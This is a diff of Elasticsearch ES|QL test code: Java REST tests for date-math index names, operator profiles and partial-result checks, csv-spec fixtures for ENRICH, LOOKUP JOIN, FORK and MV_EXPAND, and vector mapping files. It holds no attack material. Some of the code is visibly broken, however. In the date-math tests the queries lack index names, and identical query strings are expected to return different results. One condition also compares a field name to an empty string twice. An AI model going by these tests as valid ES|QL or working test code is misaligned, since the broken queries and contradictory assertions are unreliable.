DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(2)) }; + + int idx = 0; + for (String index : indices) { + createIndex(index); + for (int i = 0; i < 10; i++) { + Request request = new Request("POST", "/" + index + "/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"f\":" + idx++ + "}"); + assertOK(client().performRequest(request)); + } + } + + String query = """ + { + "query": "from | sort f asc | limit 1 | keep f" + } + """; + Request request = new Request("POST", "/_query"); + request.setJsonEntity(query); + Response resp = client().performRequest(request); + Map results = entityAsMap(resp); + List values = (List) results.get("values"); + assertThat(values.size(), is(1)); + List row = (List) values.get(0); + assertThat(row.get(0), is(0)); + + query = """ + { + "query": "from | sort f asc | limit 1 | keep f" + } + """; + request = new Request("POST", "/_query"); + request.setJsonEntity(query); + resp = client().performRequest(request); + results = entityAsMap(resp); + values = (List) results.get("values"); + assertThat(values.size(), is(1)); + row = (List) values.get(0); + assertThat(row.get(0), is(10)); + + for (String index : indices) { + assertThat(deleteIndex(index).isAcknowledged(), is(true)); // clean up + } + } + + public void testDateMathInJoin() throws IOException { + ZonedDateTime now = ZonedDateTime.now(ZoneOffset.UTC); + + createIndex("idx", Settings.EMPTY, """ + { + "properties": { + "key": { + "type": "keyword" + } + } + } + """); + + Request request = new Request("POST", "/idx/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"key\":\"foo\"}"); + assertOK(client().performRequest(request)); + + String[] lookupIndices = { + "lookup-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now), + "lookup-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(1)) }; + + for (String index : lookupIndices) { + createIndex(index, Settings.builder().put("mode", "lookup").build(), """ + { + "properties": { + "key": { + "type": "keyword" + } + } + } + """); + request = new Request("POST", "/" + index + "/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"key\":\"foo\", \"value\": \"" + index + "\"}"); + assertOK(client().performRequest(request)); + } + + String[] queries = { + "from idx | lookup join on key | limit 1", + "from idx | lookup join on key | limit 1" }; + for (int i = 0; i < queries.length; i++) { + String queryPayload = "{\"query\": \"" + queries[i] + "\"}"; + request = new Request("POST", "/_query"); + request.setJsonEntity(queryPayload); + Response resp = client().performRequest(request); + Map results = entityAsMap(resp); + List values = (List) results.get("values"); + assertThat(values.size(), is(1)); + List row = (List) values.get(0); + assertThat(row.get(1), is(lookupIndices[i])); + } + + assertThat(deleteIndex("idx").isAcknowledged(), is(true)); // clean up + for (String index : lookupIndices) { + assertThat(deleteIndex(index).isAcknowledged(), is(true)); // clean up + } + } + static MapMatcher commonProfile() { return matchesMap() // .entry("description", any(String.class)) @@ -829,7 +943,9 @@ private String checkOperatorProfile(Map o) { .entry("process_nanos", greaterThan(0)) .entry("processed_queries", List.of("*:*")) .entry("partitioning_strategies", matchesMap().entry("rest-esql-test:0", "SHARD")); - case "ValuesSourceReaderOperator" -> basicProfile().entry("values_loaded", greaterThanOrEqualTo(0)) + case "ValuesSourceReaderOperator" -> basicProfile().entry("pages_received", greaterThan(0)) + .entry("pages_emitted", greaterThan(0)) + .entry("values_loaded", greaterThanOrEqualTo(0)) .entry("readers_built", matchesMap().extraOk()); case "AggregationOperator" -> matchesMap().entry("pages_processed", greaterThan(0)) .entry("rows_received", greaterThan(0)) @@ -840,7 +956,7 @@ private String checkOperatorProfile(Map o) { case "ExchangeSourceOperator" -> matchesMap().entry("pages_waiting", 0) .entry("pages_emitted", greaterThan(0)) .entry("rows_emitted", greaterThan(0)); - case "ProjectOperator", "EvalOperator" -> basicProfile(); + case "ProjectOperator", "EvalOperator" -> basicProfile().entry("pages_processed", greaterThan(0)); case "LimitOperator" -> matchesMap().entry("pages_processed", greaterThan(0)) .entry("limit", 1000) .entry("limit_remaining", 999) @@ -876,8 +992,7 @@ private String checkOperatorProfile(Map o) { } private MapMatcher basicProfile() { - return matchesMap().entry("pages_processed", greaterThan(0)) - .entry("process_nanos", greaterThan(0)) + return matchesMap().entry("process_nanos", greaterThan(0)) .entry("rows_received", greaterThan(0)) .entry("rows_emitted", greaterThan(0)); } diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java index df4444f5a1e47..027bf3313e661 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java @@ -195,6 +195,15 @@ public void buildIndex() throws IOException { bulk.setJsonEntity(b.toString()); Response bulkResponse = client().performRequest(bulk); assertThat(entityToMap(bulkResponse.getEntity(), XContentType.JSON), matchesMap().entry("errors", false).extraOk()); + + // Forcemerge to one segment to get more consistent results. + Request forcemerge = new Request("POST", "/_forcemerge"); + forcemerge.addParameter("max_num_segments", "1"); + Response forcemergeResponse = client().performRequest(forcemerge); + assertThat( + entityToMap(forcemergeResponse.getEntity(), XContentType.JSON), + matchesMap().entry("_shards", matchesMap().entry("failed", 0).entry("successful", greaterThanOrEqualTo(1)).extraOk()).extraOk() + ); } @Override diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java index 7df7eff0d189b..4285fe112a7c6 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java @@ -23,6 +23,7 @@ import org.elasticsearch.geometry.utils.WellKnownText; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; +import org.elasticsearch.test.MapMatcher; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.test.rest.TestFeatureService; import org.elasticsearch.xcontent.XContentType; @@ -276,9 +277,7 @@ protected final void doTest(String query) throws Throwable { Map prevTooks = supportsTook() ? tooks() : null; Map answer = runEsql(builder.query(query), testCase.assertWarnings(deduplicateExactWarnings())); - var clusters = answer.get("_clusters"); - var reason = "unexpected partial results" + (clusters != null ? ": _clusters=" + clusters : ""); - assertThat(reason, answer.get("is_partial"), anyOf(nullValue(), is(false))); + assertNotPartial(answer); var expectedColumnsWithValues = loadCsvSpecValues(testCase.expectedResults); @@ -303,6 +302,14 @@ protected final void doTest(String query) throws Throwable { } } + static Map assertNotPartial(Map answer) { + var clusters = answer.get("_clusters"); + var reason = "unexpected partial results" + (clusters != null ? ": _clusters=" + clusters : ""); + assertThat(reason, answer.get("is_partial"), anyOf(nullValue(), is(false))); + + return answer; + } + private Map tooks() throws IOException { Request request = new Request("GET", "/_xpack/usage"); HttpEntity entity = client().performRequest(request).getEntity(); @@ -431,16 +438,17 @@ public static void assertRequestBreakerEmpty() throws Exception { HttpEntity entity = adminClient().performRequest(new Request("GET", "/_nodes/stats")).getEntity(); Map stats = XContentHelper.convertToMap(XContentType.JSON.xContent(), entity.getContent(), false); Map nodes = (Map) stats.get("nodes"); - for (Object n : nodes.values()) { - Map node = (Map) n; - Map breakers = (Map) node.get("breakers"); - Map request = (Map) breakers.get("request"); - assertMap( - "circuit breakers not reset to 0", - request, - matchesMap().extraOk().entry("estimated_size_in_bytes", 0).entry("estimated_size", "0b") + + MapMatcher breakersEmpty = matchesMap().extraOk().entry("estimated_size_in_bytes", 0).entry("estimated_size", "0b"); + + MapMatcher nodesMatcher = matchesMap(); + for (Object name : nodes.keySet()) { + nodesMatcher = nodesMatcher.entry( + name, + matchesMap().extraOk().entry("breakers", matchesMap().extraOk().entry("request", breakersEmpty)) ); } + assertMap("circuit breakers not reset to 0", stats, matchesMap().extraOk().entry("nodes", nodesMatcher)); }); } diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java index 1cb2a6a526191..1ba4365ea3e92 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java @@ -249,6 +249,11 @@ public Map runEsql(RestEsqlTestCase.RequestObjectBuilder request return RestEsqlTestCase.runEsql(requestObject, new AssertWarnings.NoWarnings(), RestEsqlTestCase.Mode.SYNC); } + public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject, boolean checkPartialResults) + throws IOException { + return RestEsqlTestCase.runEsql(requestObject, new AssertWarnings.NoWarnings(), RestEsqlTestCase.Mode.SYNC, checkPartialResults); + } + protected void indexTimestampData(int docs, String indexName, String date, String differentiatorFieldName) throws IOException { indexTimestampDataForClient(client(), docs, indexName, date, differentiatorFieldName); } diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java index 0c29d7a711257..5e85c20b026ab 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java @@ -60,6 +60,7 @@ import static org.elasticsearch.test.MapMatcher.assertMap; import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.elasticsearch.xpack.esql.EsqlTestUtils.as; +import static org.elasticsearch.xpack.esql.qa.rest.EsqlSpecTestCase.assertNotPartial; import static org.elasticsearch.xpack.esql.qa.rest.RestEsqlTestCase.Mode.ASYNC; import static org.elasticsearch.xpack.esql.qa.rest.RestEsqlTestCase.Mode.SYNC; import static org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter.dateTimeToString; @@ -1248,13 +1249,21 @@ public static Map runEsqlAsync(RequestObjectBuilder requestObjec return runEsqlAsync(requestObject, randomBoolean(), new AssertWarnings.NoWarnings()); } + public static Map runEsql( + RequestObjectBuilder requestObject, + AssertWarnings assertWarnings, + Mode mode, + boolean checkPartialResults + ) throws IOException { + var results = mode == ASYNC + ? runEsqlAsync(requestObject, randomBoolean(), assertWarnings) + : runEsqlSync(requestObject, assertWarnings); + return checkPartialResults ? assertNotPartial(results) : results; + } + public static Map runEsql(RequestObjectBuilder requestObject, AssertWarnings assertWarnings, Mode mode) throws IOException { - if (mode == ASYNC) { - return runEsqlAsync(requestObject, randomBoolean(), assertWarnings); - } else { - return runEsqlSync(requestObject, assertWarnings); - } + return runEsql(requestObject, assertWarnings, mode, true); } public static Map runEsqlSync(RequestObjectBuilder requestObject, AssertWarnings assertWarnings) throws IOException { diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java index 129676183a853..a8d4b9ca677fc 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java @@ -38,7 +38,11 @@ public class EsqlQueryGenerator { - public record Column(String name, String type) {} + public static final String COLUMN_NAME = "name"; + public static final String COLUMN_TYPE = "type"; + public static final String COLUMN_ORIGINAL_TYPES = "original_types"; + + public record Column(String name, String type, List originalTypes) {} public record QueryExecuted(String query, int depth, List outputSchema, List> result, Exception exception) {} @@ -288,7 +292,10 @@ public static boolean fieldCanBeUsed(Column field) { // https://github.com/elastic/elasticsearch/issues/121741 field.name().equals("") // this is a known pathological case, no need to test it for now - || field.name().equals("")) == false; + || field.name().equals("") + // no dense vectors for now, they are not supported in most commands + || field.type().contains("vector") + || field.originalTypes.stream().anyMatch(x -> x.contains("vector"))) == false; } public static String unquote(String colName) { diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java index 56fc925ed8421..f9d0b20a1e742 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java @@ -29,6 +29,9 @@ import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.ENRICH_POLICIES; import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.availableDatasetsForEs; import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.loadDataSetIntoEs; +import static org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_NAME; +import static org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_ORIGINAL_TYPES; +import static org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_TYPE; public abstract class GenerativeRestTest extends ESRestTestCase { @@ -53,7 +56,6 @@ public abstract class GenerativeRestTest extends ESRestTestCase { "Data too large", // Circuit breaker exceptions eg. https://github.com/elastic/elasticsearch/issues/130072 // Awaiting fixes for correctness - "Expecting the following columns \\[.*\\], got", // https://github.com/elastic/elasticsearch/issues/129000 "Expecting at most \\[.*\\] columns, got \\[.*\\]" // https://github.com/elastic/elasticsearch/issues/129561 ); @@ -145,7 +147,7 @@ private static CommandGenerator.ValidationResult checkResults( ); if (outputValidation.success() == false) { for (Pattern allowedError : ALLOWED_ERROR_PATTERNS) { - if (allowedError.matcher(outputValidation.errorMessage()).matches()) { + if (isAllowedError(outputValidation.errorMessage(), allowedError)) { return outputValidation; } } @@ -156,13 +158,24 @@ private static CommandGenerator.ValidationResult checkResults( private void checkException(EsqlQueryGenerator.QueryExecuted query) { for (Pattern allowedError : ALLOWED_ERROR_PATTERNS) { - if (allowedError.matcher(query.exception().getMessage()).matches()) { + if (isAllowedError(query.exception().getMessage(), allowedError)) { return; } } fail("query: " + query.query() + "\nexception: " + query.exception().getMessage()); } + /** + * Long lines in exceptions can be split across several lines. When a newline is inserted, the end of the current line and the beginning + * of the new line are marked with a backslash {@code \}; the new line will also have whitespace before the backslash for aligning. + */ + private static final Pattern ERROR_MESSAGE_LINE_BREAK = Pattern.compile("\\\\\n\\s*\\\\"); + + private static boolean isAllowedError(String errorMessage, Pattern allowedPattern) { + String errorWithoutLineBreaks = ERROR_MESSAGE_LINE_BREAK.matcher(errorMessage).replaceAll(""); + return allowedPattern.matcher(errorWithoutLineBreaks).matches(); + } + @SuppressWarnings("unchecked") private EsqlQueryGenerator.QueryExecuted execute(String command, int depth) { try { @@ -184,12 +197,23 @@ private EsqlQueryGenerator.QueryExecuted execute(String command, int depth) { } @SuppressWarnings("unchecked") - private List outputSchema(Map a) { - List> cols = (List>) a.get("columns"); + private static List outputSchema(Map a) { + List> cols = (List>) a.get("columns"); if (cols == null) { return null; } - return cols.stream().map(x -> new EsqlQueryGenerator.Column(x.get("name"), x.get("type"))).collect(Collectors.toList()); + return cols.stream() + .map(x -> new EsqlQueryGenerator.Column((String) x.get(COLUMN_NAME), (String) x.get(COLUMN_TYPE), originalTypes(x))) + .collect(Collectors.toList()); + } + + @SuppressWarnings("unchecked") + private static List originalTypes(Map x) { + List originalTypes = (List) x.get(COLUMN_ORIGINAL_TYPES); + if (originalTypes == null) { + return List.of(); + } + return originalTypes; } private List availableIndices() throws IOException { diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java b/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java index 7ec9ee6344551..210a4be28f840 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java @@ -863,7 +863,7 @@ static Version randomVersion() { } public static WildcardLike wildcardLike(Expression left, String exp) { - return new WildcardLike(EMPTY, left, new WildcardPattern(exp)); + return new WildcardLike(EMPTY, left, new WildcardPattern(exp), false); } public static RLike rlike(Expression left, String exp) { diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec index 9bfb08eb82b45..2aa6189a957ec 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec @@ -661,3 +661,104 @@ from * author.keyword:keyword|book_no:keyword|scalerank:integer|street:keyword|bytes_in:ul|@timestamp:unsupported|abbrev:keyword|city_location:geo_point|distance:double|description:unsupported|birth_date:date|language_code:integer|intersects:boolean|client_ip:unsupported|event_duration:long|version:version|language_name:keyword Fyodor Dostoevsky |1211 |null |null |null |null |null |null |null |null |null |null |null |null |null |null |null ; + + +statsAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1", "Connected to 10.1.0.2") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| STATS messages = count_distinct(message) BY language_name +; + +messages:long | language_name:keyword +2 | English +; + + +enrichAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +coordinatorEnrichAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _coordinator:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +doubleRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _remote:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +enrichAfterCoordinatorEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _coordinator:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +doubleCoordinatorEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _coordinator:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _coordinator:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec index 1cd9f60d01581..2c5b8a650a64a 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec @@ -5,16 +5,44 @@ simpleFork required_capability: fork_v9 +// tag::simpleFork[] FROM employees | FORK ( WHERE emp_no == 10001 ) ( WHERE emp_no == 10002 ) | KEEP emp_no, _fork | SORT emp_no +// end::simpleFork[] ; +// tag::simpleFork-result-[] emp_no:integer | _fork:keyword 10001 | fork1 10002 | fork2 +// end::simpleFork-result[] +; + +simpleForkWithStats +required_capability: fork_v9 + +// tag::simpleForkWithStats[] +FROM books METADATA _score +| WHERE author:"Faulkner" +| EVAL score = round(_score, 2) +| FORK (SORT score DESC, author | LIMIT 5 | KEEP author, score) + (STATS total = COUNT(*)) +| SORT _fork, score DESC, author +// end::simpleForkWithStats[] +; + +// tag::simpleForkWithStats-result[] +author:text | score:double | _fork:keyword | total:long +William Faulkner | 2.39 | fork1 | null +William Faulkner | 2.39 | fork1 | null +Colleen Faulkner | 1.59 | fork1 | null +Danny Faulkner | 1.59 | fork1 | null +Keith Faulkner | 1.59 | fork1 | null +null | null | fork2 | 18 +// end::simpleForkWithStats-result[] ; forkWithWhereSortAndLimit diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec index 6254b42e176fa..108ae5e250fad 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec @@ -1841,6 +1841,41 @@ max:long 8268153 ; +wildcardDropAfterLookupJoin +required_capability: join_lookup_v12 +required_capability: drop_with_wildcard_after_lookup_join + +ROW somefield = 0, type = "Production" +| KEEP somefield, type +| LOOKUP JOIN message_types_lookup ON type +| DROP *field +; + +type:keyword | message:keyword +Production | Production environment +; + + +wildcardDropAfterLookupJoinTwice +required_capability: join_lookup_v12 +required_capability: drop_with_wildcard_after_lookup_join + +ROW somefield = 0, type = "Production" +| KEEP somefield, type +| EVAL otherfield = 123, language_code = 3 +| LOOKUP JOIN message_types_lookup ON type +| DROP *field +| EVAL foofield = 123 +| KEEP * +| LOOKUP JOIN languages_lookup ON language_code +| DROP *ge, *field +; + +type:keyword | language_code:integer | language_name:keyword +Production | 3 | Spanish +; + + ############################################### # LOOKUP JOIN on mixed numerical fields ############################################### @@ -4738,3 +4773,101 @@ FROM sample_data_ts_nanos 2023-10-23T12:27:28.948123456Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 2023-10-23T12:15:03.360123456Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 ; + +############################################### +# LOOKUP JOIN and ENRICH +############################################### + +enrichAfterLookupJoin +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| LOOKUP JOIN message_types_lookup ON message +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | type:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | Success | English +; + + +lookupJoinAfterEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| ENRICH languages_policy ON language_code +| LOOKUP JOIN message_types_lookup ON message +; + +message:keyword | language_code:keyword | language_name:keyword | type:keyword +Connected to 10.1.0.1 | 1 | English | Success +; + + +lookupJoinAfterRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| LOOKUP JOIN message_types_lookup ON message +; + +message:keyword | language_code:keyword | language_name:keyword | type:keyword +Connected to 10.1.0.1 | 1 | English | Success +; + + +lookupJoinAfterLimitAndRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| LIMIT 1 +| ENRICH _remote:languages_policy ON language_code +| EVAL enrich_language_name = language_name, language_code = language_code::integer +| LOOKUP JOIN languages_lookup_non_unique_key ON language_code +| KEEP message, enrich_language_name, language_name, country.keyword +| SORT language_name, country.keyword +; + +message:keyword | enrich_language_name:keyword | language_name:keyword | country.keyword:keyword +Connected to 10.1.0.1 | English | English | Canada +Connected to 10.1.0.1 | English | English | United States of America +Connected to 10.1.0.1 | English | English | null +Connected to 10.1.0.1 | English | null | United Kingdom +; + + +lookupJoinAfterTopNAndRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| SORT message +| LIMIT 1 +| ENRICH _remote:languages_policy ON language_code +| EVAL enrich_language_name = language_name, language_code = language_code::integer +| LOOKUP JOIN languages_lookup_non_unique_key ON language_code +| KEEP message, enrich_language_name, language_name, country.keyword +| SORT language_name, country.keyword +; + +message:keyword | enrich_language_name:keyword | language_name:keyword | country.keyword:keyword +Connected to 10.1.0.1 | English | English | Canada +Connected to 10.1.0.1 | English | English | United States of America +Connected to 10.1.0.1 | English | English | null +Connected to 10.1.0.1 | English | null | United Kingdom +; diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json index 24c4102e428f8..0d7373e300267 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json @@ -13,7 +13,9 @@ "type": "dense_vector", "similarity": "l2_norm", "index_options": { - "type": "hnsw" + "type": "hnsw", + "m": 16, + "ef_construction": 100 } } } diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json index 572d9870d09da..9c7d34f0f15e4 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json @@ -5,7 +5,12 @@ }, "vector": { "type": "dense_vector", - "similarity": "l2_norm" + "similarity": "l2_norm", + "index_options": { + "type": "hnsw", + "m": 16, + "ef_construction": 100 + } } } } diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec index 20ce3ecc5a396..c7dbe01ef6f09 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec @@ -419,3 +419,65 @@ emp_no:integer | job_positions:keyword 10001 | Accountant 10001 | Senior Python Developer ; + +testMvExpandInconsistentColumnOrder1 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| eval foo_1 = 1, foo_2 = 2 +| sort message +| mv_expand foo_1 +; + +message:keyword | type:keyword | foo_1:integer | foo_2:integer +Connected to 10.1.0.1 | Success | 1 | 2 +Connected to 10.1.0.2 | Success | 1 | 2 +Connected to 10.1.0.3 | Success | 1 | 2 +Connection error | Error | 1 | 2 +Development environment | Development | 1 | 2 +Disconnected | Disconnected | 1 | 2 +Production environment | Production | 1 | 2 +; + +testMvExpandInconsistentColumnOrder2 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| eval foo_1 = [1, 3], foo_2 = 2 +| sort message +| mv_expand foo_1 +; + +message:keyword | type:keyword | foo_1:integer | foo_2:integer +Connected to 10.1.0.1 | Success | 1 | 2 +Connected to 10.1.0.1 | Success | 3 | 2 +Connected to 10.1.0.2 | Success | 1 | 2 +Connected to 10.1.0.2 | Success | 3 | 2 +Connected to 10.1.0.3 | Success | 1 | 2 +Connected to 10.1.0.3 | Success | 3 | 2 +Connection error | Error | 1 | 2 +Connection error | Error | 3 | 2 +Development environment | Development | 1 | 2 +Development environment | Development | 3 | 2 +Disconnected | Disconnected | 1 | 2 +Disconnected | Disconnected | 3 | 2 +Production environment | Production | 1 | 2 +Production environment | Production | 3 | 2 +; + +testMvExpandInconsistentColumnOrder3 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| sort type +| eval language_code = 1, `language_name` = false, message = true, foo_3 = 1, foo_2 = null +| eval foo_3 = "1", `foo_3` = -1, foo_1 = 1, `language_code` = null, `foo_2` = "1" +| mv_expand foo_1 +| limit 5 +; + +type:keyword | language_name:boolean | message:boolean | foo_3:integer | foo_1:integer | language_code:null | foo_2:keyword +Development | false | true | -1 | 1 | null | 1 +Disconnected | false | true | -1 | 1 | null | 1 +Error | false | true | -1 | 1 | null | 1 +Production | false | true | -1 | 1 | null | 1 +Success | false | true | -1 | 1 | null | 1 +; + diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java index 34b94207c5a8d..2aa731eaa5d29 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java @@ -8,15 +8,21 @@ package org.elasticsearch.xpack.esql.action; import 